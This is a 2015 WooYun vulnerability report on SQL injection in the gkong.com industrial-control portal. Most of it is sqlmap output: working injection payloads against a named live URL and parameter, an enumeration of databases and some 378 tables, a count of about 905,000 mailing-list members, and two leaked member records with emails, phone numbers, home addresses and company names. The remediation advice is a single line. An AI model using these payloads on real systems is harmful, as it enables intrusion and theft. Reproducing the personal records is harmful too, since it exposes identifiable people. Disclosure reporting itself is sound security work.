漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0124937
漏洞标题:中华工控网SQL注入导致全网数据沦陷90W会员数据
相关厂商:中华工控网
漏洞作者: Ghost丶与狼共舞
提交时间:2015-07-06 17:36
修复时间:2015-08-20 17:38
公开时间:2015-08-20 17:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中华工控网SQL注入导致全网数据沦陷#90W会员数据
详细说明:
http://www.gkong.com/webcast/discussion.aspx?id=138 (GET)
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=138 AND 6150=6150
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=138 AND 5765=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5765=5765) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=138 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(117)+CHAR(120)+CHAR(114)+CHAR(85)+CHAR(98)+CHAR(78)+CHAR(71)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=138; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=138 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6041=6041) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113))
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
available databases [11]:
[*] gkong_hh
[*] GKONG_MGMT
[*] GkongSearch
[*] GoToControl
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] test
Database: gkong
[378 tables]
+----------------------------------------------------+
| AD_AddCustomerCle |
| Blog_Downloads |
| BusinessCard |
| BusinessLicense |
| ChapterDing |
| CheckRequest |
| Comm_Pingpai_main |
| DataConvert_Source |
| DataConvert_Source |
| Dictionary_CompanyType |
| Dictionary_Occupation |
| Exp_Expert |
| Exp_ExpertType |
| FC_Factory |
| FC_LOG |
| FC_Trademarks |
| FC_User |
| GK_SMSHistory |
| GK_SMSHistory |
| GK_TOP10 |
| Gk_Area_Panel |
| GuestBook |
| KeyWordsAd |
| LogoLinks |
| OLC_20 |
| OLC_50 |
| OLC_70 |
| P2PUserOnline |
| SYS_20 |
| SYS_30 |
| SYS_40 |
| SYS_50 |
| SYS_PYTable |
| Sheet1 |
| Sheng |
| SynchronizeTable |
| Temp_Download_A |
| Temp_Download_B |
| Temp_Download_C |
| Temp_Download_D |
| ThirdPartyUser |
| UserAttachment |
| UserScoreYears |
| VIEW_BBS_APPlOGO |
| VIEW_BB_BBS1 |
| V_title |
| V_vote |
| View_BookOrder |
| View_IsBlog |
| View_Person_Bbs1_Board |
| View_Person_BbsTopic_Board |
| View_Person_GK_Blog_BlogText |
| tmp-src |
| address_area |
| admin_log |
| admin_option_log |
| arc_dc |
| arc_scbg |
| bb_Address |
| bb_Admin |
| bb_BBS1 |
| bb_BBSLink |
| bb_BBSNews |
| bb_BestTopic |
| bb_BoardPermission |
| bb_Bookmark |
| bb_Class |
| bb_Config |
| bb_Friend |
| bb_GroupName |
| bb_LockIP |
| bb_Log |
| bb_Message_bak |
| bb_Message_bak |
| bb_Notice_refuse |
| bb_Notices |
| bb_Online |
| bb_ScoreOperate |
| bb_SmallPaper |
| bb_UserAccess |
| bb_UserGroups |
| bb_UserScore20081030中午12点 |
| bb_UserScorePerDay |
| bb_UserTitle |
| bb_User_TransmitEmail |
| bb_Vote |
| bb_VoteUser |
| bb_board_trademark |
| bb_board_trademark |
| bb_download_info |
| bb_medal |
| bb_notdownload |
| bb_topic_info |
| bb_topic_info |
| bb_user_mobile |
| bb_user_mobile |
| bb_user_oauth |
| bb_vip |
| bbs_AppLogo |
| bbs_ExtrScoreLog |
| bbs_blackHouse |
| bbs_hotImages |
| bbs_talk |
| bbs_tuijian |
| blockWords |
| blog_admin |
| blog_bloginfo |
| blog_bloginfo |
| blog_blogteam |
| blog_classname |
| blog_comment |
| blog_filtrate |
| blog_jubao |
| blog_lockip |
| blog_message |
| blog_notdownload |
| blog_skin |
| blog_subject |
| blog_sysskin |
| blog_tag |
| blog_trackback |
| blog_user |
| blog_userskin |
| blog_usertype |
| book_addressList |
| book_class |
| book_gift |
| book_order |
| book_product |
| book_publish |
| bu_message |
| bu_order_goods |
| bu_order_list |
| caa_huiyuandanwei |
| campus_articles |
| campus_login |
| client_Dictionary |
| client_DownloadTable |
| comm_add_dl_pp |
| comm_cs1_dl |
| comm_cs_dl |
| comm_cs_pp |
| comm_dalei |
| comm_pinpai |
| comm_temp_pinpaileibie |
| cp_invite |
| cp_look |
| downloadSort |
| downloads_information |
| downloads_information |
| dtproperties |
| gk_2394872sadjkflsh_Templates |
| gk_5stars_info |
| gk_BBSWeekly |
| gk_Cheap |
| gk_Class |
| gk_Dictionary_Score |
| gk_EmailList |
| gk_EmailSubscribe |
| gk_News_OriginalType |
| gk_OnLineQuestion |
| gk_Sort_Content |
| gk_Sort_Content |
| gk_SubareaDetail |
| gk_SubareaDetail |
| gk_Templates_HTML_Detail |
| gk_Templates_HTML_List |
| gk_Templates_HTML_Url |
| gk_UserInformation |
| gk_UserScore |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_today |
| gk_WebCastLive |
| gk_WebCastLive |
| gk_WebCastQuestion |
| gk_WebCastRegister |
| gk_WebCastSection |
| gk_WebCastTeacher |
| gk_ad_date |
| gk_ad_date |
| gk_ad_layer |
| gk_admin |
| gk_applykey |
| gk_applykey |
| gk_area_improsort |
| gk_area_improsort |
| gk_area_index |
| gk_bbsztlist |
| gk_bbsztlist |
| gk_blog_CSTouPiaoRZ |
| gk_blog_CSUser |
| gk_blog_zt_sort |
| gk_blog_zt_sort |
| gk_book |
| gk_column |
| gk_copath |
| gk_diaocha_links |
| gk_edm_link |
| gk_elearn_onlinequestion |
| gk_elearn_onlinequestion |
| gk_elearn_teacher |
| gk_exhibit_column |
| gk_exhibit_column |
| gk_exhibit_info |
| gk_exhibit_links |
| gk_exhibits_wszt |
| gk_exhibits_zt |
| gk_express_user |
| gk_favor |
| gk_feedback |
| gk_field |
| gk_focus_tj |
| gk_focus_tj |
| gk_focus_type |
| gk_gg |
| gk_gkwGroup |
| gk_gkwGroupUsers |
| gk_hotQuestions |
| gk_hot_Keywords |
| gk_index_info_column |
| gk_index_info_column |
| gk_infobbs |
| gk_intercourse_questionary |
| gk_jianlinpeixun |
| gk_jxsbzzs |
| gk_kandian |
| gk_keywords |
| gk_learn_1 |
| gk_learn_1 |
| gk_lingyu_sort |
| gk_links |
| gk_loginLog |
| gk_lovewall |
| gk_msg_jubao |
| gk_mysearch |
| gk_news1 |
| gk_news_20100104 |
| gk_news_20100104 |
| gk_news_Templet |
| gk_news_sort |
| gk_oos |
| gk_pinpaileibie |
| gk_pro_series |
| gk_products |
| gk_questionary |
| gk_search_column |
| gk_search_key |
| gk_search_keywords |
| gk_search_log |
| gk_shop |
| gk_solution_20100104 |
| gk_solution_20100104 |
| gk_tuijianchanpin |
| gk_tuijianproducts |
| gk_tuwenbankuai |
| gk_userGroup |
| gk_webCastOnline |
| gk_weblink |
| gk_weekly |
| gk_wenzhai |
| gk_zhuanfang |
| gk_zhuanti |
| gk_zl_ass |
| gk_zt_lanmu |
| gk_ztsort |
| join_corporation |
| leavemess |
| login_log |
| mails_all |
| mails_auto |
| mails_gongkong |
| mails_tlm |
| mn_admin |
| mn_article |
| mn_books |
| mn_critique |
| mn_download |
| mn_infobbs |
| mn_kanhao |
| mn_log_data |
| mn_mans |
| mn_peixun |
| mn_people |
| mn_sec_sort |
| mn_sort |
| mn_sy_wenzhang |
| mn_user |
| op_user |
| rj_education |
| rj_experience |
| rj_infor |
| rj_look |
| rj_peixun |
| school_log |
| school_online |
| search_counter |
| sysconstraints |
| syssegments |
| try_product_intro |
| try_products |
| try_user |
| ty_GuestSay |
| v_user |
| view_BBS_Boards |
| view_BBS_ClassBoard |
| view_Download_List |
| view_INDEX_ALLbbUserScore |
| view_INDEX_Application_Learn |
| view_INDEX_Application_Solution |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Business_BBS |
| view_INDEX_Business_Buy |
| view_INDEX_Business_Supply |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Downloads |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Invite |
| view_INDEX_News_pass_unpass |
| view_INDEX_News_pass_unpass |
| view_INDEX_News_pass_unpass |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_pass_unpass |
| view_INDEX_Product_pass_unpass |
| view_INDEX_SearchKey |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_keywords |
| view_MailList_ExpressUser |
| view_MailList_Infor |
| view_MailList_IntercourseQuestionary |
| view_MailList_Questionary |
| view_MailList_bbUser |
| view_SynchronizationBBSTopic |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_1 |
| view_Templates_Inc_buy_RIGHT |
| view_Templates_Inc_buy_USER |
| view_Templates_Inc_products_RIGHT |
| view_Templates_Inc_products_USER |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_infobbs_buy |
| view_Templates_products |
| view_Templates_user |
| view_ThirdPartyUser |
| view_bb_topic_info |
| view_bb_topic_info |
| view_bb_user_cn |
| view_solution_index_PageOne |
| view_solution_index_PageOne |
| web_ad |
| weixin_news |
| 经过北京邮件系统Mailbus发送失败的 |
| 论坛发贴邮箱 |
| gk_jishubu.gk_BBWeekly |
+----------------------------------------------------+
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.view_MailList_bbUser | 905427 |
+--------------------------+---------+
测试几条数据
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+------------------------+------------+--------------+------------------------+------------------------+--------------+------------------------------------+
| MailID | l_pc | l_tel | Email | l_addr | l_quhao | l_grade | l_sheng | UserName | MailType | l_hangye | l_xingzhi | lastlogin | l_province | l_fullname | UpdateDate | ChangeDate | l_occupation | l_interested |
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+------------------------+------------+--------------+------------------------+------------------------+--------------+------------------------------------+
| 346706 | 314311 | 86766485 | huntercui@126.com | 浙江省海盐县沈荡镇中钱村黄泥浦 | 0573 | 0 | 7 | machinesprin | 注册用户 | 15, 24, 100 | 生产厂家 | 06 14 2007 \\?a09:07PM | 浙江省 | 海盐县齐家机械弹簧厂 | 06 14 2007 \\?a09:08PM | 03 13 2008 \\?a03:17PM | 市场销售 | 11 |
| 380227 | 201906 | 36041343 | xiaojia86@126.com | 上海宝安公路455号 | 021 | 0 | 2 | xiaojia1986 | 注册用户 | 37, 15, 7, 41, 29, 5, 6, 23, 13, 30, 100 | 生产厂家 | 10 16 2007 \\?a04:48PM | 上海市 | 上海商德富吉电源有限公司 | 10 16 2007 \\?a04:49PM | 03 13 2008 \\?a03:43PM | 市场销售 | 19, 9, 5, 8, 20, 26, 17, 6, 27, 10 |
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+------------------------+------------+--------------+------------------------+------------------------+--------------+------------------------------------+
修复方案:
参数过滤
版权声明:转载请注明来源 Ghost丶与狼共舞@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)